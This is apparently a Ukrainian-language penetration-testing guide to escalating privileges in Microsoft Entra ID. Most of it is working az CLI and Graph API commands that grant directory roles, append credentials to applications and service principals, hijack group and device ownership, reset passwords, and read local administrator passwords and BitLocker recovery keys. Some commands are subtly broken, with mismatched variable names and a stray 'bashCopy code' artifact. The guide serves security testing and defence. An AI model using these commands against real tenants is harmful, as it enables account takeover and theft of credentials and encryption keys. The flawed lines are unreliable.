Az - EntraID Privesc

Roles

Role: Privileged Role Administrator

Ця роль містить необхідні детальні дозволи для того, щоб мати можливість призначати ролі принципалам і надавати більше дозволів ролям. Обидві дії можуть бути зловживані для ескалації привілеїв.

• Призначити роль користувачу:

# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

• Додати більше дозволів до ролі:

# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Applications

microsoft.directory/applications/credentials/update

Це дозволяє зловмиснику додавати облікові дані (паролі або сертифікати) до існуючих додатків. Якщо додаток має привілейовані дозволи, зловмисник може автентифікуватися як цей додаток і отримати ці привілеї.

# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert

microsoft.directory/applications.myOrganization/credentials/update

Це дозволяє ті ж дії, що й applications/credentials/update, але обмежено до однодиректорних застосунків.

az ad app credential reset --id <appId> --append

microsoft.directory/applications/owners/update

Опис: Оновлення власників додатків Потенціал зловживання: Додавши себе як власника, зловмисник може маніпулювати додатком, включаючи облікові дані та дозволи.

az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

Service Principals

microsoft.directory/servicePrincipals/credentials/update

Це дозволяє зловмиснику додавати облікові дані до існуючих службових принципів. Якщо службовий принцип має підвищені привілеї, зловмисник може прийняти ці привілеї.

az ad sp credential reset --id <sp-id> --append

Якщо ви отримуєте помилку "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid.", це тому, що неможливо змінити властивість passwordCredentials сервісного принципалу, і спочатку потрібно його розблокувати. Для цього вам потрібна дозвіл (microsoft.directory/applications/allProperties/update), який дозволяє вам виконати:

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

Це дозволяє зловмиснику додавати облікові дані до існуючих службових принципів. Якщо службовий принцип має підвищені привілеї, зловмисник може прийняти ці привілеї.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

Схоже на додатки, ця дозволяє додавати більше власників до службового принципалу. Володіння службовим принципалом дозволяє контролювати його облікові дані та дозволи.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

microsoft.directory/servicePrincipals/disable та enable

Ці дозволи дозволяють вимкнути та увімкнути службові принципали. Зловмисник може використовувати цей дозвіл, щоб увімкнути службовий принципал, до якого він може отримати доступ якимось чином, щоб ескалувати привілеї.

Зверніть увагу, що для цієї техніки зловмиснику знадобляться додаткові дозволи, щоб захопити увімкнений службовий принципал.

bashCopy code# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Ці дозволи дозволяють створювати та отримувати облікові дані для єдиного входу, що може дозволити доступ до сторонніх додатків.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Групи

microsoft.directory/groups/allProperties/update

Ця дозволяє додавати користувачів до привілейованих груп, що призводить до ескалації привілеїв.

az ad group member add --group <GroupName> --member-id <UserId>

Примітка: Ця дозволена дія виключає групи, які можуть бути призначені ролям Entra ID.

microsoft.directory/groups/owners/update

Ця дозволена дія дозволяє стати власником груп. Власник групи може контролювати членство в групі та налаштування, потенційно підвищуючи привілеї в групі.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Примітка: Ця дозволена дія виключає групи, призначені для ролей Entra ID.

microsoft.directory/groups/members/update

Ця дозволена дія дозволяє додавати учасників до групи. Зловмисник може додати себе або шкідливі облікові записи до привілейованих груп, що може надати підвищений доступ.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

Ця дозволяє оновлювати правило членства в динамічній групі. Зловмисник може змінити динамічні правила, щоб включити себе до привілейованих груп без явного додавання.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Примітка: Ця дозволена дія виключає групи, які можуть бути призначені ролям Entra ID.

Привілеї динамічних груп

Можливо, що користувачі можуть підвищити свої привілеї, змінюючи свої власні властивості, щоб бути доданими як члени динамічних груп. Для отримання додаткової інформації дивіться:

Користувачі

microsoft.directory/users/password/update

Ця дозволена дія дозволяє скинути пароль для неадміністраторів, що дозволяє потенційному зловмиснику підвищити привілеї до інших користувачів. Цю дозволену дію не можна призначити для користувацьких ролей.

az ad user update --id <user-id> --password "kweoifuh.234"

microsoft.directory/users/basic/update

Ця привілегія дозволяє змінювати властивості користувача. Зазвичай можна знайти динамічні групи, які додають користувачів на основі значень властивостей, тому ця дозволена дія може дозволити користувачу встановити потрібне значення властивості, щоб стати членом конкретної динамічної групи та підвищити привілеї.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Політики умовного доступу та обхід MFA

Неправильно налаштовані політики умовного доступу, що вимагають MFA, можуть бути обійдені, перевірте:

Пристрої

microsoft.directory/devices/registeredOwners/update

Ця дозволяє зловмисникам призначати себе власниками пристроїв, щоб отримати контроль або доступ до налаштувань та даних, специфічних для пристроїв.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

Ця дозволяє зловмисникам асоціювати свій обліковий запис з пристроями, щоб отримати доступ або обійти політики безпеки.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

Ця дозволяє зловмисникам читати властивості резервних облікових записів локальних адміністраторів для пристроїв, приєднаних до Microsoft Entra, включаючи пароль

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

Цей дозвіл дозволяє отримувати доступ до ключів BitLocker, що може дозволити зловмиснику розшифровувати диски, ставлячи під загрозу конфіденційність даних.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Інші цікаві дозволи (TODO)

• microsoft.directory/applications/permissions/update

• microsoft.directory/servicePrincipals/permissions/update

• microsoft.directory/applications.myOrganization/allProperties/update

• microsoft.directory/applications/allProperties/update

• microsoft.directory/servicePrincipals/appRoleAssignedTo/update

• microsoft.directory/applications/appRoles/update

• microsoft.directory/applications.myOrganization/permissions/update